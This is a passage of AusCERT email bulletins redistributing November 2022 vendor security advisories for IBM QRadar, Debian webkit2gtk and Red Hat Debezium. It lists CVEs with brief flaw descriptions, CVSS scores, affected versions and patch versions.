Tr9Sh01CQVADadfeGp/Iat0TE2hscMZaTm2A1ZdmOeyK70r0jXvCCHtna9spbPO7
N0OBERsqS9fC+X/XVHuehIzoUXxFUJAuaXD2weBZHJZBZ7MoUqNm50taDqoYUX0y
B2BU0uWOitKfghLRBuFhpuUZtRaZdRfDLSEjSxCTCtGwWnIj4lLlZbE9RAwNNCU1
2+z6pHHlTxZ9c6IiQF8mrIx4IJ0OMIk6oH3gm71l8T5FSMiLCcuInL0XwC5ragJ/
irrxq3GuXL8x+3BjgxnRy4kKy6KUwZsLFp7OI71X/hyjEIyhcXopiRz0PXrooluR
UtooyxSCV8M9u3658pFT2+X4WvQASmk3z+ZUnTBQXrfNgWkxyUs=
=JERa
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yVfskNZI30y1K9AQgxvBAAojcAV9u/QYfsX8HDmTiSXxYiumRRGJbr
uZWj7JQnsdpI8OdQYhNTHjy+/kWjynWFBVsUlaF43cEg96dyFy2uyAe6Kk4u8Rcu
24esZhZ9c2L2a08p6zvnZR6+55VhKJ5oeJM63lLJgdNWDCy72smq31MDgm7HT+um
cykC9qQ0sPwe6EdLnBq55HJ4VI2mA66OxVJqYgoid0lboadOUvuhU50k6zpE/+0L
RW2trcf8z0moV29AFJPTf40bV1smAwTVGVZs8uyQel4b/91orxRYGG/tsiwowsSC
dp+cmwRuXk0T/1Q9WFQuUFdM4RgaHZh+S1h9Apw2yLphzJ1hEH0VUKk0LgMRKQ2n
e1VLHMfAU9/VlCpJVI5JeEp+7Rf2IrrsxJwwXtBuahlUvueSPOppa/UEBanl5lkU
Ur3wapqppMd3q59UWRjOj5tOLb7NU4mBS6ZWzqp5l5waLx0mTw75hOZiPMV1VBza
4OrJWJM9VA9tyDr2U4HeEOsjCAV/aocchzcwsMZ60LMKt+4sftN9xzsGCEJ67OUj
Uzl12n5Vo1/VuK9gqPg810970klighuv56Cbbz2lmEKep+JXpoFfVuHi+rvF59NL
7wyvLOFzO87AVPcHoqzWiTwh/X+vBR1FxD3lwPQOxXr8yChNK/rPxq9odSTdBEkT
fszxYhG79to=
=dmjh
-----END PGP SIGNATURE-----
ESB-2022.5791 - [Linux] IBM QRadar Network Packet Capture Software: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5791
Security Bulletin: IBM QRadar Network Packet Capture
includes components with multiple known vulnerabilities.
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: IBM QRadar Network Packet Capture Software
Publisher: IBM
Operating System: Linux variants
Resolution: Patch/Upgrade
CVE Names: CVE-2022-40674 CVE-2022-38177 CVE-2022-29154
CVE-2022-2526
Original Bulletin:
https://www.ibm.com/support/pages/node/6838295
Comment: CVSS (Max): 9.8 CVE-2022-40674 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: IBM
Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
IBM QRadar Network Packet Capture includes components with multiple known
vulnerabilities.
Document Information
Document number : 6838295
Modified date : 09 November 2022
Product : IBM QRadar Network Packet Capture Software
Software version : 7.4, 7.5
Operating system(s): Linux
Summary
The product includes multiple vulnerable components (e.g., framework libraries)
that may be identified and exploited with automated tools. IBM has addressed
the relevant CVEs.
Vulnerability Details
CVEID: CVE-2022-29154
DESCRIPTION: Rsync could allow a remote attacker to bypass security
restrictions, caused by improper validation of file names. By utilize
man-in-the-middle attack techniques, an attacker could exploit this
vulnerability to write arbitrary files inside the directories of connecting
peers.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
232637 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVEID: CVE-2022-38177
DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by a small
memory leak in the DNSSEC verification code for the ECDSA algorithm. By
spoofing the target resolver with responses that have a malformed ECDSA
signature, a remote attacker could exploit this vulnerability to cause named to
crash.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
236705 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2022-40674
DESCRIPTION: libexpat could allow a remote attacker to execute arbitrary code
on the system, caused by a use-after-free in the doContent function in
xmlparse.c. An attacker could exploit this vulnerability to execute arbitrary
code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
236116 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVEID: CVE-2022-2526
DESCRIPTION: systemd could allow a remote attacker to execute arbitrary code on
the system, caused by a use-after-free flaw due to the on_stream_io() function
and dns_stream_complete() function in "resolved-dns-stream.c" not incrementing
the reference counting for the DnsStream object. By sending a specially-crafted
request, an attacker could exploit this vulnerability to execute arbitrary code
or cause a denial of service condition on the system.
CVSS Base score: 8.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
235161 for the current score.
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Affected Products and Versions
+---------------------------------+------------------------------+
|Affected Product(s) |Version(s) |
+---------------------------------+------------------------------+
|IBM QRadar Network Packet Capture|7.4.0 - 7.4.3 Fix Pack 5 |
+---------------------------------+------------------------------+
|IBM QRadar Network Packet Capture|7.5.0 - 7.5.0 Update Package 2|
+---------------------------------+------------------------------+
Remediation/Fixes
IBM encourages customers to update their systems promptly.
+-------------------------+-------+-------------------------------------------+
|Product |Version|Fix |
+-------------------------+-------+-------------------------------------------+
|IBM QRadar Network Packet|7.4. |IBM QRadar Network Packet Capture 7.4.3 Fix|
|Capture | |Pack 6 |
+-------------------------+-------+-------------------------------------------+
|IBM QRadar Network Packet|7.5 |IBM QRadar Network Packet Capture 7.5.0 |
|Capture | |Update Package 3 |
+-------------------------+-------+-------------------------------------------+
Workarounds and Mitigations
None
Change History
04 Nov 2022: Initial Publication
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yRRMkNZI30y1K9AQgMAw//YtpdreJo2xZvkQ9v7LAQFD4kHbjsHBvI
NrvfdH7/PBzyAeJqx0Vv9HG2bE7O2EGPFoFbUyYQwZTY24Gmyfgu4GJEbQ0+99ix
2+AqeeNNLUGnENdE3HBQj/o5gcKUjr4oHnnUaGCJ4JHRNcOAxgIrl+WRGETxt+Lt
NyGTY9XSfTQ4Jrl7tR4JCVIkQLu5xWe/KAWfgmH7FdEsbyNGarul/xz6m4TLbn92
8005UkTRl0Pm68X4nGjrzRpemzCrhKkO9HOLaf8y8Vehrlcs50swVirm6ZqcMALN
vpAtlh6Bz9PpPwGmRNxEvr46iDdBtXkcTX4XHe6TDsj1m8s53OiKpKKBJa4Tefgm
Eyp72h2efGniYNOe8s68XYAcULOWLJCSoRMzQHMdwG02MneAL/+oZQQkuPp9ghKA
PPlNWVsg48udfnsej/HW3KJ8iuHEFKrTn789ty8SKHjZ3b7Px5Qgq2dTs9rnSvIg
PagsErlhVayinME597RahaI0CVl736Q/OqYFEcPAy5b0kOXI9bYQBfRx8FNcM6lK
BHDhZPn301tTLxJ9jTmXjooXqQ5WWHE8b/5PYcnRzM3pZGMV6e6HziRJO+celH7H
6FNo1TB2eWx03/yPMpZTz9oiEBycQxK+MUumAbte5Gjx7I/r7jX/qD5wny7JTw+b
HdURNB/cRGw=
=IDTn
-----END PGP SIGNATURE-----
ESB-2022.5790 - [Linux] IBM QRadar SIEM: CVSS (Max): 9.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5790
Security Bulletin: IBM QRadar Assistant app for IBM QRadar SIEM includes
components with multiple known vulnerabilities
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: IBM QRadar SIEM
Publisher: IBM
Operating System: Linux variants
Resolution: Patch/Upgrade
CVE Names: CVE-2022-2596 CVE-2022-0536 CVE-2022-0235
CVE-2022-0155 CVE-2021-43307 CVE-2021-42581
CVE-2021-23337 CVE-2021-3795 CVE-2020-28500
CVE-2020-15168 CVE-2020-8203 CVE-2020-7753
CVE-2019-10744
Original Bulletin:
https://www.ibm.com/support/pages/node/6838293
Comment: CVSS (Max): 9.8 CVE-2021-42581 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVSS Source: IBM
Calculator: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
IBM QRadar Assistant app for IBM QRadar SIEM includes components with multiple
known vulnerabilities
Document Information
Document number : 6838293
Modified date : 09 November 2022
Product : IBM QRadar SIEM
Software version : 3.6.0
Operating system(s): Linux
Summary
The product includes vulnerable components (e.g., framework libraries) that may
be identified and exploited with automated tools. IBM has released a new
version which addresses the vulnerabilities.
Vulnerability Details
CVEID: CVE-2021-42581
DESCRIPTION: Ramda could allow a remote attacker to execute arbitrary code on
the system, caused by a prototype pollution in the mapObjIndexed function. By
supplying a specially-crafted object using the __proto__ argument, an attacker
could exploit this vulnerability to execute arbitrary code on the system.
CVSS Base score: 9.8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
226072 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CVEID: CVE-2022-0536
DESCRIPTION: Node.js follow-redirects module could allow a remote authenticated
attacker to obtain sensitive information, caused by a leakage of the
Authorization header from the same hostname during HTTPS to HTTP redirection.
By utilize man-in-the-middle attack techniques, an attacker could exploit this
vulnerability to obtain Authorization header information, and use this
information to launch further attacks against the affected system.
CVSS Base score: 2.6
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
219551 for the current score.
CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)
CVEID: CVE-2022-0155
DESCRIPTION: follow-redirects could allow a remote attacker to obtain sensitive
information, caused by an unauthorized actor. By sending a specially-crafted
request, a remote authenticated attacker could exploit this vulnerability to
obtain private personal information and use this information to launch further
attacks against the affected system.
CVSS Base score: 8
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
216974 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)
CVEID: CVE-2022-2596
DESCRIPTION: Node.js node-fetch module is vulnerable to a denial of service,
caused by a regular expression denial of service (ReDoS) flaw in the
isOriginPotentiallyTrustworthy() function in the referrer.js script. By sending
specially-crafted regex input, a remote attacker could exploit this
vulnerability to cause a denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
232616 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2020-15168
DESCRIPTION: Node.js node-fetch module is vulnerable to a denial of service,
caused by the failure to honor the size option after following a redirect. By
using a specially-crafted file, a remote attacker could exploit this
vulnerability to consume excessive resource on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
188155 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2022-0235
DESCRIPTION: Node.js node-fetch could allow a remote authenticated attacker to
obtain sensitive information, caused by a flaw when fetching a remote url with
Cookie. By sending a specially-crafted request, an attacker could exploit this
vulnerability to obtain sensitive information.
CVSS Base score: 6.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
217758 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CVEID: CVE-2020-7753
DESCRIPTION: trim is vulnerable to a denial of service. By sending a specially
crafted value, a remote attacker could exploit this vulnerability to cause a
regular expression denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
190630 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2020-28500
DESCRIPTION: Node.js lodash module is vulnerable to a denial of service, caused
by a regular expression denial of service (ReDoS) in the toNumber, trim and
trimEnd functions. By sending a specially-crafted request, a remote attacker
could exploit this vulnerability to cause a denial of service condition.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
196972 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2021-23337
DESCRIPTION: Node.js lodash module could allow a remote authenticated attacker
to execute arbitrary commands on the system, caused by a command injection flaw
in the template. By sending a specially-crafted request, an attacker could
exploit this vulnerability to execute arbitrary commands on the system.
CVSS Base score: 7.2
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
196797 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
CVEID: CVE-2019-10744
DESCRIPTION: Node.js lodash module is vulnerable to a denial of service, caused
by a prototype pollution flaw. By sending a specially-crafted request using a
constructor payload, a remote attacker could exploit this vulnerability to
inject properties onto Object.prototype to cause a denial of service condition.
CVSS Base score: 9.1
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
167415 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)
CVEID: CVE-2020-8203
DESCRIPTION: Node.js lodash module is vulnerable to a denial of service, caused
by a prototype pollution attack. A remote attacker could exploit this
vulnerability using the merge, mergeWith, and defaultsDeep functions to inject
properties onto Object.prototype to crash the server and possibly execute
arbitrary code on the system.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
183560 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2021-43307
DESCRIPTION: Node.js semver-regex module is vulnerable to a denial of service,
caused by a regular expression denial of service (ReDoS) flaw in the test()
method. By sending specially-crafted regex input, a remote attacker could
exploit this vulnerability to cause a denial of service.
CVSS Base score: 5.9
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
228061 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVEID: CVE-2021-3795
DESCRIPTION: semver-regex is vulnerable to a denial of service, caused by the
inefficient regular expression complexity. A remote attacker could exploit this
vulnerability to cause a denial of service.
CVSS Base score: 7.5
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/
209463 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Affected Products and Versions
+--------------------+-------------+
|Affected Product(s) |Version(s) |
+--------------------+-------------+
|IBM QRadar Assistant|1.0.0 - 3.5.2|
+--------------------+-------------+
Remediation/Fixes
IBM encourages customers to update their systems promptly.
Update to 3.6.0
Workarounds and Mitigations
None
Change History
27 Oct 2022: Initial Publication
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yRMMkNZI30y1K9AQiCWw/9EwBvl4o6lHTY120oRA9R9+5qQREgKX7Q
F14eTjkJxgfC8GUG+jsCdxZQgD3MXwTJcKp9HBjmoG/3Ukn+5n4/Sq1qlrJt0o59
5OXRYG5ID70gpa/yeEmTDQHUCB9DpKBkklw6ovtzeqqGUsIuuZiStm1xr6dTTgE9
iAk89w8SNyM1KZENuon+rh3O3cxoSsLe4f+LaGIL1dZ0oKP2H2XtsB6H8jLunoij
noPaUoalTZOTu35I0QmDtU1vTo4+9T+wT+k5p3cn4aCwam3dC17E2PMh73Yem5F/
LC9UbCHCz1OyyQLksujM8DKZvUoGdyEeKII6wQk3safoNB+1Zua3admgGOc2NADP
cvKTiEB7UCB4h+4azYciWq6E6VjGqNKjreFv2NkEOk+8aJn9S7pWyIrySjwJVXud
EjCCZzHtChmAN9aGlFrsZt2Y26tOVK/ErTFOP9EG3EOK73y/gqwJvoEdb83mUKE0
P40iNGKPxf2S+QErE8WcTMMNC2ebTVOO/JYeOWdYkNkNmD9KGBSGvZvBxI6aTlnS
kfIgtKFDGQHX1GlROswzOgXeoyfpFaSHr9qLZ0z5JCwISxUhE2jpY1Wwkz5XQqbP
H3Eu0LWsIRxbjPLGhjRF4ZMUEECW08Pqd7m0UKGeUk5I5rJTneSRrNLZPYuen2Qu
22u42r7jik8=
=eUzS
-----END PGP SIGNATURE-----
ESB-2022.5789 - [Debian] webkit2gtk: CVSS (Max): 8.8
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5789
webkit2gtk security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: webkit2gtk
Publisher: Debian
Operating System: Debian GNU/Linux
Resolution: Patch/Upgrade
CVE Names: CVE-2022-42824 CVE-2022-42823 CVE-2022-42799
Original Bulletin:
https://lists.debian.org/debian-lts-announce/2022/11/msg00010.html
Comment: CVSS (Max): 8.8 CVE-2022-42823 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
CVSS Source: NVD
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
- - -------------------------------------------------------------------------
Debian LTS Advisory DLA-3183-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Emilio Pozuelo Monfort
November 09, 2022 https://wiki.debian.org/LTS
- - -------------------------------------------------------------------------
Package : webkit2gtk
Version : 2.38.2-1~deb10u1
CVE ID : CVE-2022-42799 CVE-2022-42823 CVE-2022-42824
The following vulnerabilities have been discovered in the WebKitGTK
web engine:
CVE-2022-42799
Jihwan Kim and Dohyun Lee discovered that visiting a malicious
website may lead to user interface spoofing.
CVE-2022-42823
Dohyun Lee discovered that processing maliciously crafted web
content may lead to arbitrary code execution.
CVE-2022-42824
Abdulrahman Alqabandi, Ryan Shin and Dohyun Lee discovered that
processing maliciously crafted web content may disclose sensitive
user information.
For Debian 10 buster, these problems have been fixed in version
2.38.2-1~deb10u1.
We recommend that you upgrade your webkit2gtk packages.
For the detailed security status of webkit2gtk please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/webkit2gtk
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
- -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEcJymx+vmJZxd92Q+nUbEiOQ2gwIFAmNrYnIACgkQnUbEiOQ2
gwLj3A/9E66Zfw9IOyJLtEJpaSoRXxQDEOybRt8B/7Aj73jP3WvsWrvwE/wY8487
R03nBubqfaQM8ALQC3mnFOF4/iNyppcOPkvTQ7ZbNbkNQOTIvs6S6t3eKlL3V9Xu
p5K+U5u5/7J/z/YBmozGvoSTg/l8E5N8V4XVEHjylYYQE716vH5ow8RyTKJcsBf8
YXbrHIYK3cGUSjWjn8gTN8/29DIutkesTWVzRFtViBHIuLjw2XqswQQqDKR+9bCU
zn1FNbZ/VoJ1nE0/VLHw+1/w25aaQY3eCEr90+APDOsJIsOljlwOAE3RqpCACym6
hAtnTB9M6SafrxVvwhGg2v2RRCyh+DLp9l1KojSUWRJpglq0ZimV+p2v2W5JpNnV
phZVKDinq1OhFZe5UWy3fk43vCiZhWuzZ6LVZTHqoRvcS17lRDAJxY9qJKeH2L00
jZjHqxyue7/ov6T+9P2PeHYxZf2ea+PAex5iwAr6adlP5ZITSG+EHn4JUUjKtvEu
V0CL2qdDP3TXMOBaZuNrm+5rLxAmTXh8FkFkPxlyLR8WKeu9j0X73d6ODVcjZhhB
BOEchVExA7F8wB4K6U74RRbDzvirhvZV0xqmKzs3apnGGez5YTsGRXG2GRGVfaFU
JzE72tdLL3oz+ZgpxICNR2/vf3t7hVSzpf3TK0AkNeS7nx3ltgs=
=HXnx
- -----END PGP SIGNATURE-----
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: https://auscert.org.au/gpg-key/
iQIVAwUBY2yLKckNZI30y1K9AQjldw//XvFNWQNqRNcSotaZs6Pg3k4JxQPBpyqQ
yZ7rFeBscUXwyIvNqhCCri4aVKGcsY4FWZmf4Ojvp/oZO0xuyfXFvn1Vbrrxee30
pGwF+P+Q88IzeU5s4jhtW42vkwqPzyvJMD4z4fK3iVk+EvdYuRM2962RekcuW4Kv
RUB7Xovgq11RpyAd1slNxAMWChhx8WCC9emrFevPKL1vAOjbzMx5pn+DAJf+drYj
58rfZRf2bk39Z0PRUw9ZbbnW+ajpv1zvlkAq0zyORxq1vQZGQu6dR5r9ALntLD3/
TjA7yEUH9kWS5PzyrJd/ZA2gMWfSJwS8eFDdDy5vcgEX1vZQA8pe4zRyNDzhqtLj
PDleFnO36lgwr02AuWa9qoKB3l0O080aJ5iQ3HpAf3OTocm1rKYuL8YXrwp56Qn2
OWDbp4AO7Ftrdv8MwoQDmKyBPqhVpFcOSbbtokz4CPOLUmCsyWlgFDsj/Ab3H+1o
BrLmrBkuPR6myzZ65W3VcY8JdyYcFi6LcXDWTxoxzMGS2sHB+EtAh6E/s27Z67MV
s1NR2TkgpVaqcFzFw66tHlqAdTNZVjAqVHdgZMRBWKddXO4fsW4rNffm9It8nqJ4
XjSS7KJ1COsEZx4o9dxlGlaKNC+IybL5uQye0dx5CeH/HY5xwtMPsbVCklASB7bw
S2fhSbzW+OA=
=E8mz
-----END PGP SIGNATURE-----
ESB-2022.5788 - [RedHat] Red Hat Integration Debezium 1.9.7: CVSS (Max): 7.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2022.5788
Red Hat Integration Debezium 1.9.7 security update
10 November 2022
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Red Hat Integration Debezium 1.9.7
Publisher: Red Hat
Operating System: Red Hat
Resolution: Patch/Upgrade
CVE Names: CVE-2022-3171 CVE-2021-22569
Original Bulletin:
https://access.redhat.com/errata/RHSA-2022:7896
Comment: CVSS (Max): 7.5 CVE-2022-3171 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVSS Source: Red Hat
Calculator: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Integration Debezium 1.9.7 security update
Advisory ID: RHSA-2022:7896-01
Product: Red Hat Integration
Advisory URL: https://access.redhat.com/errata/RHSA-2022:7896
Issue date: 2022-11-09
CVE Names: CVE-2021-22569 CVE-2022-3171
=====================================================================
1. Summary:
A security update for Debezium is now available for Red Hat Integration.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Debezium is a distributed platform that turns your existing databases into
event streams, so applications can see and respond immediately to each
row-level change in the databases.
Debezium is built on top of Apache Kafka and provides Kafka Connect
compatible connectors that monitor specific database management systems.
Debezium records the history of data changes in Kafka logs, from where your
application consumes them. This makes it possible for your application to
easily consume all of the events correctly and completely. Even if your
application stops unexpectedly, it will not miss anything: when the
application restarts, it will resume consuming the events where it left
off.
Security Fix(es):
* protobuf-java: potential DoS in the parsing procedure for binary data
(CVE-2021-22569)
